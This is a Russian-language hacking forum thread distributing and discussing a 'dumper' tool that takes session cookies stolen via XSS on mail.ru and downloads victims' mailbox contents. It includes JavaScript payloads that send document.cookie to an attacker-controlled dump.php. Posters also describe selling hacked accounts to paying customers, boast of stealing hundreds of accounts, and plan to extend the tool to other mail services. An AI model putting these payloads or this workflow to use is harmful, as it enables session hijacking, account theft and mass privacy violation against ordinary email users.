![]() |
[new mail.ru dumper] by slider
Ребят ... а можно я старое описание оставлю .. а ?! =\ Ибо правда заеп... скажу только что код уменьшил в три раза, улучил функционал, исправил багесы, старая версия кстать загнулась ... вобщем прошу любить и жаловать Наверняка каждому из вас приходилось или приходиться иметь дело с XSS на mail.ru т.к в данный момент это самая актуальная бага на выше упомянутом сервере .... как нам уже известно сессия не живёт вечно и желательно за небольшой промежуток времени собрать максимально большое количество информации... Думаю именно в тут вам и поможет эта тулза... в ее задачи как раз и входить ..
Кому сможет пригодиться этот скрипт?! ИМХО всем .. от мала до велика.... пригодится тем у кого "напряг" со временем... пригодится ленивым ... кому лень рыться на ящике и сливать в ручную... пригодится незнающим .. те у кого проблема с тем что бы поменять кукисы... пригодится тем кто делает бизнесс на хеке майл.ру ... например .. фейк не сработал ... а сессию вы получили ... не отдадите же вы заказчику окуратно записаные кукисы?!... заказчик наверняка кроме как распечатать и повешать их на стенку ничего не придумает ;) P.S: Если нуна .. то можно сделать версию а-ля сниффер ... будет собирать кукису и аккуратненько дамрить всё на сервере..... PHP код:
------------------------------------------------------------------------------------------------------ Долгожданная версия дампера под сниффер - такс... а как юзать!?.. Да элементарно.. при юзании ксс подставляем ссылку на этот скрипт - ещё что то!?.. ну да... подправьте положение перловы в первой строке: #!"C:\perl\bin\perl.exe" на ваш путь.. ммм... а так же установите нужные права... + убедитесь что в папке со скриптом стоят права на запись =) Download here:http://webfile.ru/3815167 |
Вообще экзотика - такие вещи на перле писать =)
|
brain[pillow] , почему это?
|
Ну это сугубо моё личное мнение. Такие вещи обычно на PHP или JS пишутся.
|
=== 30.10.2009
PHP код:
PHP код:
Вот его особенности.
1. Только PHP-функционал: http://mysite.xz/dump.php?Mpop=blabla (обратите внимание, что значение куки яндекса yandex_nickname должно быть url-кодированно, если содержит кириллические символы! некоторые снифферы полностью url-декодируют все куки, что может повлечь ошибку. правильное значение получается вызовом document.cookie либо повторным кодированием) или new Image().src='http://myhost.xz/dump.php?' + document.cookie; 2. Весь функционал (целесообразнее) with (document) getElementsByTagName('head').item(0).appendChild( createElement('script')).src = 'http://myhost.xz/dump.php?' + document.cookie; Для работы требуется сайт с поддержкой сокетов, выключенным сейфмодом и права на запись. На данный момент скрипт работоспособен в том виде, в котором он размещен, править после форума ничего не нужно. === 3.01.2010 Как проверить работоспособность php-части дампера на локальном хосте? Для этого нужно использовать только такой способ запуска: http://localhost/xampp/test/dump.php?Mpop=blabla Другие способы на локалхосте могут не работать из-за политик безопасности, принятых в некоторых браузерах (IE к ним не относится, там работают все способы). Как проверить работоспособность javascript-части дампера на локальном хосте? Найдите в дампере следующие строки: PHP код:
PHP код:
javascript:with (document) getElementsByTagName('head').item(0).appendChild( createElement('script')).src = 'http://localhost/xampp/test/dump.php?' + document.cookie;void(0); Появился файл registr_info.txt в директории mailbox/yourmail@mail.ru ? Если да, то открываете поддомен, например, otvet.mail.ru и пишете то же самое, предварительно удалив старый registr_info.txt. Если и теперь все сработало, то и с javascript-частью все в порядке. На текущий момент скрипт полностью работоспособен. |
LeverOne я удивлён что ты не создал 3ую категорию, "замечания очень несущественного характера":
В cабе create_dir ну никак не нужно: Код:
$o = '['.'-'x5Код:
$o = '['.'-'x 5Касательно 1го пункта: исправил всё... Касательно 2го пункта: 1. Перезалил на файлообменник 2. Менять не буду ... мне так больше нравится 3. Разделители лишними не бывают, убирать их не стоит Спасибо за суровые замечания LeverOne, с утра очень подняло настроение)... |
Цитата:
|
эм.. есть предложение сделать "универсальный" дампер )
прикрутить яху, гмейл, яндекс.почту, etc как смотришь на ето? ) |
Если будет актуально .. то почему бы и нет .. разом дампить ящики всех знаменитых сервисов ... заразить саент фреймами ... с ксс в знаменитых почтовиках и жрать результатов.. только нужно будет многое переписывать... нгадо будет отладить механизм..
Так же сделать чекер какой то .. что бы повторно ту же почту не сливать ... |
Цитата:
По моему перл более удобен при решении таких задач чем пшп |
Цитата:
|
Извиняюсь, можно нубский вопрос?)
А как этим пользоваться? Я перл совсем не знаю, на все мои попытки выдаётся Something wrong: e-mail ADD: Может кто-нибудь напишет примерчик с использованием дампера. Я видимо не так или не туда всё ввожу))) |
Kornero пример:
Код:
$cookies = q(Mpop=значения;); |
Вещь прикольная, но тут есть одна беда: сессия здохнет до того, как вы успеете что-то с неё поиметь. У меня из 16-ти только что отыметых кук только 13 срабатывали (остальные, видимо, по тем или иным причинам уже успели отойти в мир иной. И это свежак нереальный, только что со снифа. А вы прикиньте, что будет через час или два...). Тут есть смысл прикрутить автопизд инфы по мере поступления кук на сниф, чтобы снизить вероятность промаха. Вот тогда можно по идее ваще без фейков обходиться, если можно будет вытаскивать инфу о пароле и т.д., как указывалось ранее. В этом плане удобно с контактом работать. Там куки гораздо дольше живут и дохнут только если закрыть сессию. А на мэйле они сами по себе могут ласты посклеивать и потом будешь перед заказчиком с опущенными в пол глазами стоять... Тем более контакт далеко не все закрывают т.к. влом по 50 раз пас вводить на дню :)
|
DIMON4G
А можно совсем пример?=) Т.е. с буковками) Я попробовал как ты сказал: Цитата:
|
Расслабсо, корнеро. Освойся для начала с xss, почитай про куки. Попиздь акков для тренировки. Ты сам не знаешь, зачем тебе эта тулза. Тупо увидел что-то интересное и сразу пытаешься во все влезть и все понять. Что-то из серии "увидел мяч, хочу в ЦСКА". Научись сначала просто попадать по мячу, а потом поговорим :)
|
Ну положим, с xss я вполне разбираюсь, что такое куки впринципе знаю, даже как их делать на пхп. И акков я натырил как раз 300 штук))) Вот хотел побыстрому всю инфу с них слить...
|
Цитата:
Цитата:
|
Тогда вписывай куки исмотри, что не так. Анализируй ошибки, которые выдает прога. Я щас тоже покопаюсь )
|
Она выдаёт столько ошибок, что они все не влазят в командную строку и самые первые затираются=)))) А анализировать код у меня не вышло ввиду того что перл не знаю вообще, а сам язык уж больно сильно отличается от Pascal;C;Java;PHP которые я более менее знаю... Ладно в любом случае я сёдня уезжаю недели на две. Потом как-нибудь перл поучу)
|
Принимайте "снифферную" версию ... в первом посте |
Скрипты на Mail.Ru не пашут ;( Обновите плииз. А то как раз XSS выложили на майл ру, а скрипта под рукой нету ;(
|
PHP код:
|
| Время: 03:52 |